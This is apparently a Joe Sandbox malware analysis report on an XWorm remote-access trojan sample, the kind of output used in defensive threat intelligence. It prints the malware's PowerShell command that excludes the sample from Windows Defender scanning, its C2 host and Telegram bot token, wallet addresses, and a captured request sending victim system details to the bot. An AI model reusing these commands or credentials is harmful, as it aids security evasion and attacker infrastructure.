Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
Analysis ID:1518076
MD5:a4cd1ff60c7b69df5a061df3365e60c7
SHA1:e85cd869046c923938c1268c5eed9d30f0f94668
SHA256:657b68666c2b79d65d51a403dd7fa0e35b1109156290efd69a681777eb6e4107
Tags:AsyncRATexe
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Telegram RAT
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Contains functionality to log keystrokes (.Net Source)
Loading BitLocker PowerShell Module
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe (PID: 6568 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe" MD5: A4CD1FF60C7B69DF5A061DF3365E60C7)
    • powershell.exe (PID: 1472 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 6468 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["various-wages.gl.at.ply.gg"], "Port": "55202", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.4", "Telegram URL": "https://api.telegram.org/bot7503421576:AAFe-HqEJI6A9e-kdWp8RSPiI27fCE4Lw2Q/sendMessage?chat_id=985088883"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_XWorm_1Yara detected XWormJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000005.00000002.3595610221.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      00000005.00000002.3595610221.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
      • 0x88a6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
      • 0x8943:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
      • 0x8a58:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
      • 0x8438:$cnc4: POST / HTTP/1.1
      00000000.00000002.2088628125.00000000025B1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        00000000.00000002.2088628125.00000000025B1000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x13552:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x1d832:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x7e9b2:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x135ef:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x1d8cf:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x7ea4f:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x13704:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x1d9e4:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x7eb64:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x130e4:$cnc4: POST / HTTP/1.1
        • 0x1d3c4:$cnc4: POST / HTTP/1.1
        • 0x7e544:$cnc4: POST / HTTP/1.1
        Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe PID: 6568JoeSecurity_XWormYara detected XWormJoe Security
          Click to see the 4 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
            5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
              5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
              • 0x8aa6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
              • 0x8b43:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
              • 0x8c58:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
              • 0x8638:$cnc4: POST / HTTP/1.1
              0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.unpackJoeSecurity_XWormYara detected XWormJoe Security
                0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                • 0x6ca6:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                • 0x6d43:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                • 0x6e58:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                • 0x6838:$cnc4: POST / HTTP/1.1
                Click to see the 8 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, ParentProcessId: 6568, ParentProcessName: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe", ProcessId: 1472, ProcessName: powershell.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, ParentProcessId: 6568, ParentProcessName: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe", ProcessId: 1472, ProcessName: powershell.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe", ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, ParentProcessId: 6568, ParentProcessName: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe", ProcessId: 1472, ProcessName: powershell.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-25T11:31:08.995831+020028536851A Network Trojan was detected192.168.2.549708149.154.167.220443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-09-25T11:32:23.446645+020028559241Malware Command and Control Activity Detected192.168.2.549734147.185.221.2255202TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 00000000.00000002.2088628125.00000000025B1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["various-wages.gl.at.ply.gg"], "Port": "55202", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.4", "Telegram URL": "https://api.telegram.org/bot7503421576:AAFe-HqEJI6A9e-kdWp8RSPiI27fCE4Lw2Q/sendMessage?chat_id=985088883"}
                Multi AV Scanner detection for submitted file
                Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeReversingLabs: Detection: 44%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpackString decryptor: various-wages.gl.at.ply.gg
                Source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpackString decryptor: 55202
                Source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpackString decryptor: <123456789>
                Source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpackString decryptor: <Xwormmm>
                Source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpackString decryptor: XWorm V5.4
                Source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpackString decryptor: USB.exe
                Source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpackString decryptor: bc1q4ul0exh4vcd9z9fchkyc5rud8dtwsgkugpg2hu
                Source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpackString decryptor: 0xBAD33b9Ee3C66782641D7662A66557A167543AB8
                Source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpackString decryptor: TQHfQNjDo2mPrBMghaWA6fZLJ6zHLwXKn5
                Source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpackString decryptor: 7503421576:AAFe-HqEJI6A9e-kdWp8RSPiI27fCE4Lw2Q
                Source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpackString decryptor: 985088883
                Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49708 version: TLS 1.2
                Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601570061.00000000072AB000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbs source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601179462.000000000683A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Xml.ni.pdb source: WER7A57.tmp.dmp.13.dr
                Source: Binary string: fSgG.pdbSHA256 source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
                Source: Binary string: Accessibility.pdb source: WER7A57.tmp.dmp.13.dr
                Source: Binary string: System.ni.pdbRSDS source: WER7A57.tmp.dmp.13.dr
                Source: Binary string: n.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601570061.00000000072AB000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: n0C:\Windows\mscorlib.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601570061.00000000072AB000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: System.Configuration.pdb$ source: WER7A57.tmp.dmp.13.dr
                Source: Binary string: System.Configuration.ni.pdb source: WER7A57.tmp.dmp.13.dr
                Source: Binary string: mscorlib.ni.pdbRSDS source: WER7A57.tmp.dmp.13.dr
                Source: Binary string: System.Configuration.pdb source: WER7A57.tmp.dmp.13.dr
                Source: Binary string: System.Xml.pdb source: WER7A57.tmp.dmp.13.dr
                Source: Binary string: System.pdb source: WER7A57.tmp.dmp.13.dr
                Source: Binary string: System.Xml.ni.pdbRSDS# source: WER7A57.tmp.dmp.13.dr
                Source: Binary string: System.Core.ni.pdb source: WER7A57.tmp.dmp.13.dr
                Source: Binary string: Microsoft.VisualBasic.pdb source: WER7A57.tmp.dmp.13.dr
                Source: Binary string: \??\C:\Windows\symbols\exe\fSgG.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3600830735.00000000067A0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: %%.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601570061.00000000072AB000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: System.Windows.Forms.pdb source: WER7A57.tmp.dmp.13.dr
                Source: Binary string: mscorlib.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3600830735.0000000006797000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601570061.00000000072AB000.00000004.00000010.00020000.00000000.sdmp, WER7A57.tmp.dmp.13.dr
                Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb] source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3600830735.00000000067A0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601179462.000000000683A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Users\user\Desktop\fSgG.pdbe source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601179462.000000000683A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER7A57.tmp.dmp.13.dr
                Source: Binary string: System.Windows.Forms.pdb|c source: WER7A57.tmp.dmp.13.dr
                Source: Binary string: \??\C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.PDB source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3595773433.0000000000F36000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mscorlib.pdbSK source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3600830735.00000000067A0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: System.Management.pdb source: WER7A57.tmp.dmp.13.dr
                Source: Binary string: System.Drawing.pdb source: WER7A57.tmp.dmp.13.dr
                Source: Binary string: mscorlib.ni.pdb source: WER7A57.tmp.dmp.13.dr
                Source: Binary string: System.Management.ni.pdb source: WER7A57.tmp.dmp.13.dr
                Source: Binary string: nC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601570061.00000000072AB000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: System.Core.pdb source: WER7A57.tmp.dmp.13.dr
                Source: Binary string: fSgG.pdb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe
                Source: Binary string: symbols\dll\mscorlib.pdbLb source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3601570061.00000000072AB000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER7A57.tmp.dmp.13.dr
                Source: Binary string: System.ni.pdb source: WER7A57.tmp.dmp.13.dr
                Source: Binary string: System.Core.ni.pdbRSDS source: WER7A57.tmp.dmp.13.dr

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.5:49734 -> 147.185.221.22:55202
                Source: Network trafficSuricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.5:49708 -> 149.154.167.220:443
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: various-wages.gl.at.ply.gg
                Uses the Telegram API (likely for C&C communication)
                Source: unknownDNS query: name: api.telegram.org
                Yara detected Generic Downloader
                Source: Yara matchFile source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, type: UNPACKEDPE
                Source: global trafficTCP traffic: 192.168.2.5:49710 -> 147.185.221.22:55202
                Source: global trafficHTTP traffic detected: GET /bot7503421576:AAFe-HqEJI6A9e-kdWp8RSPiI27fCE4Lw2Q/sendMessage?chat_id=985088883&text=%E2%98%A0%20%5BXWorm%20V5.4%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AA0FB38C6050D4C23DA87%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20BSY776%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.4 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
                Source: Joe Sandbox ViewIP Address: 147.185.221.22 147.185.221.22
                Source: Joe Sandbox ViewASN Name: TELEGRAMRU TELEGRAMRU
                Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /bot7503421576:AAFe-HqEJI6A9e-kdWp8RSPiI27fCE4Lw2Q/sendMessage?chat_id=985088883&text=%E2%98%A0%20%5BXWorm%20V5.4%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AA0FB38C6050D4C23DA87%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20BSY776%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.4 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                Source: global trafficDNS traffic detected: DNS query: various-wages.gl.at.ply.gg
                Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3597124997.0000000002E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000000.00000002.2088628125.00000000025B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameP
                Source: Amcache.hve.13.drString found in binary or memory: http://upx.sf.net
                Source: SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000000.00000002.2088628125.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3597124997.0000000002E51000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe, 00000005.00000002.3595610221.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49708 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Contains functionality to log keystrokes (.Net Source)
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, XLogger.cs.Net Code: KeyboardLayout
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 5.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25c5d8c.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exe.25bbaac.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000005.00000002.3595610221.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: 00000000.00000002.2088628125.00000000025B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeCode function: 0_2_009DD3A40_2_009DD3A4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeCode function: 0_2_04BB00060_2_04BB0006
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeCode function: 0_2_04BB00400_2_04BB0040
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeCode function: 5_2_011DD3A85_2_011DD3A8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeCode function: 5_2_011D13F85_2_011D13F8
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeCode function: 5_2_054385C05_2_054385C0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeCode function: 5_2_0543D1905_2_0543D190
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeCode function: 5_2_054393585_2_05439358
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeCode function: 5_2_054353845_2_05435384
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.5111.21143.exeCode function: 5_2_054359905_2_05435990
